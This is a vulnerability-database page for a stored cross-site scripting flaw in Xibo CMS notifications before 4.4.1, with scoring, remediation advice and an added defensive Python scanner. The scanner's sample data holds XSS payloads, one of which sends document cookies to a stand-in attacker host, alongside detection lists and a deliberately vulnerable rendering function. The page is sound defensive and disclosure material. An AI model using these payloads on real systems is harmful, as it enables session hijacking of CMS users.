Description
Xibo is an open source digital signage platform with a web content management system and Windows display player software. A stored Cross-Site Scripting (XSS) vulnerability in versions prior to 4.4.1 allows an authenticated user with notification creation permissions to inject arbitrary JavaScript into the notification body. When the notification is set as an "interrupt," the payload executes automatically in the browser of any targeted user upon login, requiring zero user interaction. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Access to the Notification Centre to view past notifications, and include "Add Notification" button to allow for the creation of new notifications. Users should upgrade to version 4.4.1 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.
Published: 2026-04-24
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting with zero‑click execution
Action: Immediate Patch
AI Analysis

Impact

A stored Cross‑Site Scripting flaw (CWE‑79, improper neutralization of input during web page generation) exists in Xibo CMS versions prior to 4.4.1. An authenticated user who can create notifications can place arbitrary JavaScript in the notification body, and the CMS renders that body without neutralizing it. When the notification is marked as "interrupt," the CMS shows it to the users it targets on their next login, so the payload runs in each target's browser session without any further action on their part; this is why the CVSS vector carries UI:N. Because the script executes as the viewing user, an account that holds only notification privileges can act inside a more privileged session, including an administrator's if an administrator is among the targets.

Affected Systems

The vulnerability affects the Xibo CMS platform provided by xibosignage. Any installation running a version older than 4.4.1 is susceptible. The fix ships in release 4.4.1; all earlier releases remain vulnerable. The NVD CPE match (cpe:2.3:a:xibosignage:xibo:*) carries no version floor, so treat every pre‑4.4.1 deployment as affected regardless of age.

Risk and Exploitability

The CVSS v3.1 base score is 6.4 (Medium) with vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N: reachable over the network, low attack complexity, low privileges required, no user interaction (the interrupt fires at login), and a changed scope because the script runs in another user's browser rather than in the attacker's own session. The EPSS score below 1% estimates a low probability of exploitation in the wild over the next 30 days, the vulnerability is not listed in CISA's KEV catalog, and the SSVC assessment records no known exploitation. The main mitigating factor is that the attacker needs an authenticated account holding both Notification Centre access and the Add Notification permission, which are not granted to non‑administrators by default. Where such an account is compromised or its holder is hostile, the JavaScript runs in the victim's browser context at login and can perform any action the victim's CMS session can perform.

Generated by OpenCVE AI on April 28, 2026 at 14:29 UTC.

Remediation

Vendor fix: upgrade Xibo CMS to version 4.4.1, which fixes this issue. Workaround for installations that cannot upgrade yet: revoke Notification Centre access and the Add Notification permission from users who are not trusted, since both are required to plant the payload.

OpenCVE Recommended Actions

  • Upgrade Xibo CMS to version 4.4.1 or later to apply the vendor patch.
  • Revoke notification centre view and add‑notification privileges from users who do not need them.
  • If an upgrade is pending, delete or disable any existing interrupt notifications that may contain malicious content and prevent the creation of new notifications until the fix is applied.

Generated by OpenCVE AI on April 28, 2026 at 14:29 UTC.
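
The following is an added example, not code from Xibo or from OpenCVE's analysis. It covers two things in one place: a parser-based scan that flags script-bearing markup in stored notification bodies, which is the review the third recommended action above calls for while the 4.4.1 upgrade is pending, and a side-by-side of the rendering pattern behind CWE-79 (stored markup interpolated into the page unchanged) against escape-on-output. The sample rows, the column names notificationId, isInterrupt and body, and the host attacker.example are constructed for the example and are not Xibo's schema or real data; export the real bodies from the CMS database before running it against an installation.

```python
"""Triage helper for stored XSS in notification bodies (added example; not
Xibo's code). Scans stored bodies for script-bearing markup so existing
interrupt notifications can be reviewed before the 4.4.1 upgrade, and shows
the rendering pattern behind CWE-79 beside escape-on-output."""
import html
from html.parser import HTMLParser

# Elements that execute script or embed foreign content that can; <svg> and
# <math> are flagged conservatively as containers, not only <script> itself.
SCRIPT_ELEMENTS = {"script", "iframe", "object", "embed", "svg", "math"}
URL_ATTRIBUTES = {"href", "src", "action", "formaction", "xlink:href"}
SCRIPT_URL_SCHEMES = ("javascript:", "vbscript:", "data:")


class ScriptMarkupFinder(HTMLParser):
    """Records every construct in a fragment that can run script."""

    def __init__(self):
        super().__init__()
        self.findings = []  # HTMLParser decodes entities in attribute values,
                            # so &#106;avascript: arrives here as javascript:

    def handle_starttag(self, tag, attrs):
        if tag in SCRIPT_ELEMENTS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRIBUTES and value:
                # Browsers ignore whitespace and control characters around
                # and inside the scheme ("java\tscript:"), so drop them first.
                scheme_part = "".join(c for c in value if ord(c) > 32).lower()
                for scheme in SCRIPT_URL_SCHEMES:
                    if scheme_part.startswith(scheme):
                        self.findings.append(f"{scheme} URL in {name} on <{tag}>")


def find_script_markup(body):
    """Return the list of findings for one notification body ([] if clean)."""
    finder = ScriptMarkupFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


def audit_notifications(rows):
    """Return (notificationId, isInterrupt, findings) for every row whose body
    carries script, interrupt notifications first because they fire at login."""
    flagged = []
    for row in sorted(rows, key=lambda r: not r["isInterrupt"]):
        findings = find_script_markup(row["body"])
        if findings:
            flagged.append((row["notificationId"], row["isInterrupt"], findings))
    return flagged


def render_vulnerable(body):
    """The CWE-79 pattern: stored markup is interpolated into the page as-is."""
    return f'<div class="notification-body">{body}</div>'


def render_escaped(body):
    """Escape-on-output: the body is displayed as text, so it cannot execute."""
    return f'<div class="notification-body">{html.escape(body, quote=True)}</div>'


# Constructed sample rows; the column names are an assumption, not Xibo's schema.
SAMPLE_NOTIFICATIONS = [
    {"notificationId": 1, "isInterrupt": 0,
     "body": "<b>Planned maintenance</b> at 02:00 UTC."},
    {"notificationId": 2, "isInterrupt": 1,
     "body": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"},
    {"notificationId": 3, "isInterrupt": 1,
     "body": '<img src=x onerror="alert(document.domain)">'},
    {"notificationId": 4, "isInterrupt": 0,
     "body": '<a href="&#106;avascript:alert(1)">Read more</a>'},
]

if __name__ == "__main__":
    for notification_id, is_interrupt, findings in audit_notifications(SAMPLE_NOTIFICATIONS):
        kind = "INTERRUPT" if is_interrupt else "normal"
        print(f"notification {notification_id} ({kind}): {', '.join(findings)}")
    print(render_vulnerable(SAMPLE_NOTIFICATIONS[1]["body"]))
    print(render_escaped(SAMPLE_NOTIFICATIONS[1]["body"]))
```

Escaping is the right default when notification bodies are meant to be plain text; if the product intentionally allows rich-text notifications, the equivalent fix is an allowlist sanitizer applied on output (or on save), because escaping would also neutralize legitimate formatting. Treat the scanner as triage rather than proof of absence: it flags the common execution vectors, and anything it reports in an interrupt notification should be deleted before the next targeted user logs in, as the recommended actions above describe.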


Advisories

No advisories yet.

History

Mon, 27 Apr 2026 14:45:00 +0000

Type                | Values Removed | Values Added
First Time appeared | (none)         | Xibosignage; Xibosignage xibo
CPEs                | (none)         | cpe:2.3:a:xibosignage:xibo:*:*:*:*:*:*:*:*
Vendors & Products  | (none)         | Xibosignage; Xibosignage xibo

Fri, 24 Apr 2026 19:15:00 +0000

Type    | Values Removed | Values Added
Metrics | (none)         | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 24 Apr 2026 01:15:00 +0000

Type        | Values Removed | Values Added
Description | (none)         | Xibo is an open source digital signage platform with a web content management system and Windows display player software. A stored Cross-Site Scripting (XSS) vulnerability in versions prior to 4.4.1 allows an authenticated user with notification creation permissions to inject arbitrary JavaScript into the notification body. When the notification is set as an "interrupt," the payload executes automatically in the browser of any targeted user upon login, requiring zero user interaction. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Access to the Notification Centre to view past notifications, and include "Add Notification" button to allow for the creation of new notifications. Users should upgrade to version 4.4.1 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.
Title       | (none)         | Xibo CMS has Stored XSS via Notification Body with Zero-Click Execution on Login
Weaknesses  | (none)         | CWE-79
References  | (none)         | (empty)
Metrics     | (none)         | cvssV3_1: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-24T18:18:24.562Z

Reserved: 2026-03-10T15:10:10.657Z

Link: CVE-2026-31953

Vulnrichment

Updated: 2026-04-24T17:06:17.410Z

NVD

Status : Analyzed

Published: 2026-04-24T01:16:11.000

Modified: 2026-04-27T14:43:00.820

Link: CVE-2026-31953

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-28T14:30:33Z

Weaknesses